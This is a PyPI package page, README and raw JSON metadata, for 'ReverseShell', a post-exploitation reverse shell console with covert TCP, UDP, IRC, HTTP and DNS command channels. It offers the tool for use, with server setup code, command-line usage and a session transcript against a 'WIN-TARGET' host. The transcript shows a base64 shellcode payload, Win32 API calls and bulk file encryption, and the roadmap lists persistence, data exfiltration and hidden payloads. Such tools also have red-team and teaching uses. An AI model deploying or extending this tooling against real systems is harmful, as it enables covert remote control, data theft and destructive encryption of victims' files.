ReverseShell


NameReverseShell JSON
Version 0.1.0 PyPI version JSON
download
home_pagehttps://github.com/mauricelambert/ReverseShell
SummaryThis package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).
upload_time2023-05-27 15:23:03
maintainerMaurice Lambert
docs_urlNone
authorMaurice Lambert
requires_python>=3.8
licenseGPL-3.0 License
keywords reverseshell terminal console netcat http irc dns tcp udp
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            ![ReverseShell logo](https://mauricelambert.github.io/info/python/security/ReverseShell_small.png "ReverseShell logo")

# ReverseShell

## Description

This package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).

### Version 0.0.X - POC

 - Support basic reverse shell using netcat or other standard/basic reverse shell
 - Basic terminal features
 - Commands history
 - UDP
 - Multi-sessions TCP (1 session/1 command)
 - Encrypt TCP data with SSL
 - Encrypt commands with RC4
 - Hide commands with IRC protocol
 - Hide commands with DNS (UDP) protocol
 - Hide commands with HTTP protocol
 - Advanced terminal features (required specific packets):
     - Print colored hostname, user and current directory
     - Auto-completion (executables in PATH and files in current directory)
     - Updatable any time you send the specific packet
 - Auto-restart for TCP client
 - Very large TCP packet (greater than TCP Window) is working
 - Check if command exists (only with advanced reverse shell features)

### Version 0.1.X - Dev

 - Builtins command
     - Update environment
         - Current directory
         - Files/Executables
         - Encryption key
         - Compression algorithm
             - Gzip, Lzma, Bz2, Zlib
         - Data encoding
             - Bases: 16, 32, 64 85
     - Upload and download file (optional compression)
     - Download file from URL
     - Code execution (for the python POC it's a python execution) (optional compression)
     - Shellcode runner (optional compression)
     - Single/Multiple file(s) encryption/decryption with parallelism (multi-processing) (multiple encryption support glob syntax)
     - Archive files (useful to download mutliples files with only one command)
     - Call DLL or shared object functions (for example to use Win32 API)
 - Update encryption key with random value
     - New encryption is based on the precedent encryption, without all of the precedents keys you can't decrypt data

### Version 1.0.X - TODO

 - Auto install (in memory and/or saved on the disk)
     - From basic reverse shell
     - From protocols
         - WMI (impacket plugin ?)
         - SMB (impacket plugin ?)
 - Persistence
 - Data exfiltration
 - Saved hidden payloads (for examples in Windows logs or registry)
 - Spawn TTY for Linux
 - Download multiples files on another temp socket (for parallelism, useful to export lot of data)
 - Waiting to execute command after receive it (using `Beep`, *socket timeout*, `Sleep`, *child process, async worker or thread end*, `print`)
 - Thread instead of process

### Examples

You can read multiples POC for reverse shell client written in python in the *clients* directory.

I add public and private key for default SSL certificate, is useful for test but **is not secure, create your own certificate to protect your TCP data**.

## Requirements

This package require :
 - python3
 - python3 Standard Library
 - PythonToolsKit

## Installation

```bash
pip install ReverseShell
```

## Usages

### Command lines

```bash
python3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k "abcd" # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.
```

### Python3

```python
from ReverseShell import ReverseShellSocketTcp, ReverseShell

with ReverseShellSocketTcp(address=("127.0.0.1", 1337), ssl=False, cert=None, key=None, handler=ReverseShell) as shellserver:
    shellserver.serve_forever()

# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.

from ReverseShell import ReverseShellTcp, HttpReverseShell, partial

with ReverseShellTcp(address=("127.0.0.1", 1337), ssl=True, cert="server.crt", key="server.key", handler=partial(HttpReverseShell, key=b"abcd", encoding="utf-8")) as shellserver:
    shellserver.serve_forever()

# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
```

### ReverseShell builtins commands

```
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents\ReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ update_environment
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==

WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:\Users\USER-TARGET\Documents$
```

## Screenshots

![ReverseShell](https://mauricelambert.github.io/info/python/security/ReverseShell.png "ReverseShell")

## Contributions

You are welcome to contribute ! Beginner, intermediate and advanced developpers can contribute to this repository. Python developpers, system administrators, network administrators, web developpers and compiled language developpers can contribute. See the [issues](https://github.com/mauricelambert/ReverseShell/issues) to know what we need.

## Links

 - [Github Page](https://github.com/mauricelambert/ReverseShell)
 - [Pypi](https://pypi.org/project/ReverseShell/)
 - [Documentation](https://mauricelambert.github.io/info/python/security/ReverseShell.html)
 - [Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.pyz)
 - [Windows Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.exe)
 - [Binaries shell clients](https://github.com/mauricelambert/ReverseShell/releases/latest)

## Help

```text
usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
                       [--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]

Advanced reverse shell console.

options:
  -h, --help            show this help message and exit
  --udp, -u             Use UDP socket.
  --tcp, -t             Use TCP socket.
  --multi-tcp, -T       Create TCP socket for each command and responses.
  --http, -H            Use HTTP requests and responses.
  --dns, -d             Use DNS requests and responses.
  --irc, -I             Use IRC requests and response.
  --no-color, --color, -C
                        Do not use color
  --key KEY, -k KEY     Add a key to encrypt with RC4.
  --cert CERT, -c CERT  SSL cert file.
  --private PRIVATE, -P PRIVATE
                        SSL private key file.
  --ip IP, -i IP        IP address to start the ReverseShell server.
  --port PORT, -p PORT  UDP/TCP port to start the ReverseShell server.
  --encoding ENCODING, -e ENCODING
                        The reverse shell encoding used by client.
  --ssl, -s             Use SSL over TCP socket.
  --no-timeout, -m      Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
                        reverse shell like netcat.
```

## Licence

Licensed under the [GPL, version 3](https://www.gnu.org/licenses/).

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/mauricelambert/ReverseShell",
    "name": "ReverseShell",
    "maintainer": "Maurice Lambert",
    "docs_url": null,
    "requires_python": ">=3.8",
    "maintainer_email": "mauricelambert434@gmail.com",
    "keywords": "ReverseShell,terminal,console,netcat,HTTP,IRC,DNS,TCP,UDP",
    "author": "Maurice Lambert",
    "author_email": "mauricelambert434@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/af/a3/2028220ac24b232861b1d629211096473f36b62d76307363569a8f854b7a/ReverseShell-0.1.0.tar.gz",
    "platform": "Windows",
    "description": "![ReverseShell logo](https://mauricelambert.github.io/info/python/security/ReverseShell_small.png \"ReverseShell logo\")\n\n# ReverseShell\n\n## Description\n\nThis package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).\n\n### Version 0.0.X - POC\n\n - Support basic reverse shell using netcat or other standard/basic reverse shell\n - Basic terminal features\n - Commands history\n - UDP\n - Multi-sessions TCP (1 session/1 command)\n - Encrypt TCP data with SSL\n - Encrypt commands with RC4\n - Hide commands with IRC protocol\n - Hide commands with DNS (UDP) protocol\n - Hide commands with HTTP protocol\n - Advanced terminal features (required specific packets):\n     - Print colored hostname, user and current directory\n     - Auto-completion (executables in PATH and files in current directory)\n     - Updatable any time you send the specific packet\n - Auto-restart for TCP client\n - Very large TCP packet (greater than TCP Window) is working\n - Check if command exists (only with advanced reverse shell features)\n\n### Version 0.1.X - Dev\n\n - Builtins command\n     - Update environment\n         - Current directory\n         - Files/Executables\n         - Encryption key\n         - Compression algorithm\n             - Gzip, Lzma, Bz2, Zlib\n         - Data encoding\n             - Bases: 16, 32, 64 85\n     - Upload and download file (optional compression)\n     - Download file from URL\n     - Code execution (for the python POC it's a python execution) (optional compression)\n     - Shellcode runner (optional compression)\n     - Single/Multiple file(s) encryption/decryption with parallelism (multi-processing) (multiple encryption support glob syntax)\n     - Archive files (useful to download mutliples files with only one command)\n     - Call DLL or shared object functions (for example to use Win32 API)\n - Update encryption key with random value\n     - New encryption is based on the precedent encryption, without all of the precedents keys you can't decrypt data\n\n### Version 1.0.X - TODO\n\n - Auto install (in memory and/or saved on the disk)\n     - From basic reverse shell\n     - From protocols\n         - WMI (impacket plugin ?)\n         - SMB (impacket plugin ?)\n - Persistence\n - Data exfiltration\n - Saved hidden payloads (for examples in Windows logs or registry)\n - Spawn TTY for Linux\n - Download multiples files on another temp socket (for parallelism, useful to export lot of data)\n - Waiting to execute command after receive it (using `Beep`, *socket timeout*, `Sleep`, *child process, async worker or thread end*, `print`)\n - Thread instead of process\n\n### Examples\n\nYou can read multiples POC for reverse shell client written in python in the *clients* directory.\n\nI add public and private key for default SSL certificate, is useful for test but **is not secure, create your own certificate to protect your TCP data**.\n\n## Requirements\n\nThis package require :\n - python3\n - python3 Standard Library\n - PythonToolsKit\n\n## Installation\n\n```bash\npip install ReverseShell\n```\n\n## Usages\n\n### Command lines\n\n```bash\npython3 -m ReverseShell --help\npython3 ReverseShell.pyz -h\nReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.\nReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.\nReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.\nReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.\nReverseShell -H -T -s -k \"abcd\" # To test this command use the \"shellclienthttpsencrypt_advanced.py abcd\" command. This is an advanced HTTPS encrypted (using RC4 with \"abcd\" key) reverse shell.\nReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.\nReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.\nReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.\nReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell.\n```\n\n### Python3\n\n```python\nfrom ReverseShell import ReverseShellSocketTcp, ReverseShell\n\nwith ReverseShellSocketTcp(address=(\"127.0.0.1\", 1337), ssl=False, cert=None, key=None, handler=ReverseShell) as shellserver:\n    shellserver.serve_forever()\n\n# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.\n\nfrom ReverseShell import ReverseShellTcp, HttpReverseShell, partial\n\nwith ReverseShellTcp(address=(\"127.0.0.1\", 1337), ssl=True, cert=\"server.crt\", key=\"server.key\", handler=partial(HttpReverseShell, key=b\"abcd\", encoding=\"utf-8\")) as shellserver:\n    shellserver.serve_forever()\n\n# To test this command use the \"shellclienthttpsencrypt_advanced.py abcd\" command. This is an advanced HTTPS encrypted (using RC4 with \"abcd\" key) reverse shell.\n```\n\n### ReverseShell builtins commands\n\n```\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ call_library_function kernel32.dll WinExec \"char *:calc.exe\" \"long:1\"\nReturn value: 33\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ archive_files test.zip *.md *.key\nMaking archive...\n[*] 1 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ download_url http://google.com test.html\nDone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents\\ReverseShell$ cd ..\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ update_environment\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ upload_file shellcode.py shellcode2.py\n['shellcode.py', 'shellcode2.py']\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ download_file shellcode2.py\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ python3_exec print('qwerty')\nqwerty\nNone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ upload_file_compress shellcode.py shellcode2.py\n['shellcode.py', 'shellcode2.py']\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ download_file_compress shellcode2.py\ndone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ python3_exec_compress print('qwerty')\nqwerty\nNone\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==\n\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==\n\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ encrypt_file test.html\n[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.\n[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ encrypt_file qwerty test.html\nEncryption is running...\n[*] 1 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ decrypt_file qwerty test.html\nDecryption is running...\n[*] 1 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ encrypt_files qwerty *.html *.zip\nEncryption is running...\n[*] 2 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$ decrypt_files qwerty *.html *.zip\nDecryption is running...\n[*] 2 childs process are running...\nWIN-TARGET@USER-TARGET:C:\\Users\\USER-TARGET\\Documents$\n```\n\n## Screenshots\n\n![ReverseShell](https://mauricelambert.github.io/info/python/security/ReverseShell.png \"ReverseShell\")\n\n## Contributions\n\nYou are welcome to contribute ! Beginner, intermediate and advanced developpers can contribute to this repository. Python developpers, system administrators, network administrators, web developpers and compiled language developpers can contribute. See the [issues](https://github.com/mauricelambert/ReverseShell/issues) to know what we need.\n\n## Links\n\n - [Github Page](https://github.com/mauricelambert/ReverseShell)\n - [Pypi](https://pypi.org/project/ReverseShell/)\n - [Documentation](https://mauricelambert.github.io/info/python/security/ReverseShell.html)\n - [Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.pyz)\n - [Windows Executable](https://mauricelambert.github.io/info/python/security/ReverseShell.exe)\n - [Binaries shell clients](https://github.com/mauricelambert/ReverseShell/releases/latest)\n\n## Help\n\n```text\nusage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]\n                       [--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]\n\nAdvanced reverse shell console.\n\noptions:\n  -h, --help            show this help message and exit\n  --udp, -u             Use UDP socket.\n  --tcp, -t             Use TCP socket.\n  --multi-tcp, -T       Create TCP socket for each command and responses.\n  --http, -H            Use HTTP requests and responses.\n  --dns, -d             Use DNS requests and responses.\n  --irc, -I             Use IRC requests and response.\n  --no-color, --color, -C\n                        Do not use color\n  --key KEY, -k KEY     Add a key to encrypt with RC4.\n  --cert CERT, -c CERT  SSL cert file.\n  --private PRIVATE, -P PRIVATE\n                        SSL private key file.\n  --ip IP, -i IP        IP address to start the ReverseShell server.\n  --port PORT, -p PORT  UDP/TCP port to start the ReverseShell server.\n  --encoding ENCODING, -e ENCODING\n                        The reverse shell encoding used by client.\n  --ssl, -s             Use SSL over TCP socket.\n  --no-timeout, -m      Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic\n                        reverse shell like netcat.\n```\n\n## Licence\n\nLicensed under the [GPL, version 3](https://www.gnu.org/licenses/).\n",
    "bugtrack_url": null,
    "license": "GPL-3.0 License",
    "summary": "This package implements an advanced reverse shell console (supports: TCP, UDP, IRC, HTTP and DNS).",
    "version": "0.1.0",
    "project_urls": {
        "Documentation": "https://mauricelambert.github.io/info/python/security/ReverseShell.html",
        "Executable": "https://mauricelambert.github.io/info/python/security/ReverseShell.pyz",
        "Homepage": "https://github.com/mauricelambert/ReverseShell"
    },
    "split_keywords": [
        "reverseshell",
        "terminal",
        "console",
        "netcat",
        "http",
        "irc",
        "dns",
        "tcp",
        "udp"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "afa32028220ac24b232861b1d629211096473f36b62d76307363569a8f854b7a",
                "md5": "8a119e803e1d131efa77f93d30e405c0",
                "sha256": "b68021bc2877f574b74d47e273a034645302cd1a4f8ddb83b5294aba2eff228f"
            },
            "downloads": -1,
            "filename": "ReverseShell-0.1.0.tar.gz",
            "has_sig": false,
            "md5_digest": "8a119e803e1d131efa77f93d30e405c0",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.8",
            "size": 46208,
            "upload_time": "2023-05-27T15:23:03",
            "upload_time_iso_8601": "2023-05-27T15:23:03.896941Z",
            "url": "https://files.pythonhosted.org/packages/af/a3/2028220ac24b232861b1d629211096473f36b62d76307363569a8f854b7a/ReverseShell-0.1.0.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-05-27 15:23:03",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "mauricelambert",
    "github_project": "ReverseShell",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "lcname": "reverseshell"
}
        
Elapsed time: 0.06962s